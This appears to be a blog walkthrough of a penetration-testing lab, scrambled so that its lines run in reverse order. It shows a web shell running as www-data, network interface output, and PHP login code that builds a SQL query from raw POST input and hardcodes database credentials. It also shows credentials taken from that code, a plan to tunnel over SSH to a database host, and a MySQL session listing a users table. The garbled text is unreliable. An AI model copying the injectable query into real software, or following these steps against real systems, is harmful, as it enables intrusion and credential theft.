| username | password | dob | admin | id | - - - - - | Tables_in_webapp | - Ģ rows in set (0.00 sec ) mysql> select * from users - - - - - You can turn off this feature to get a quicker startup with -A Reading table information for completion of table and column names | information_schema | | mysql | | performance_schema | | webapp | - Ĥ rows in set (0.01 sec ) mysql> use webapp Type '\c' to clear the current input statement. Other names may be trademarks of their respective Oracle is a registered trademark of Oracle Corporation and/or itsĪffiliates. Server version: 5.5.37-0 wheezy1 (Debian ) Copyright (c ) 2000, 2014, Oracle and/or its affiliates. Let’s enable an SSH tunnel to access that second box. From login.php, I harvested some credentials. Interesting, there is another box that handles the database. TX packets:62 errors:0 dropped:0 overruns:0 carrier:0 RX packets:119 errors:0 dropped:0 overruns:0 frame:0 TX packets:166 errors:0 dropped:0 overruns:0 carrier:0 RX packets:249 errors:0 dropped:0 overruns:0 frame:0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 $username = $_POST $password = $_POST mysql_connect ( "192.168.2.200", "webapp", "webapp" ) or die (mysql_error ()) mysql_select_db ( "webapp" ) or die (mysql_error ()) $query = "SELECT * FROM users where username='$username' AND password='$password'" $result = mysql_query ( $query ) or die (mysql_error ()) /sbin/ifconfigĮth0 Link encap:Ethernet HWaddr fe:7f:29:91:70:e2 ![]() Uid =33 (www-data ) gid =33 (www-data ) groups =33 (www-data ) $ whoami
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |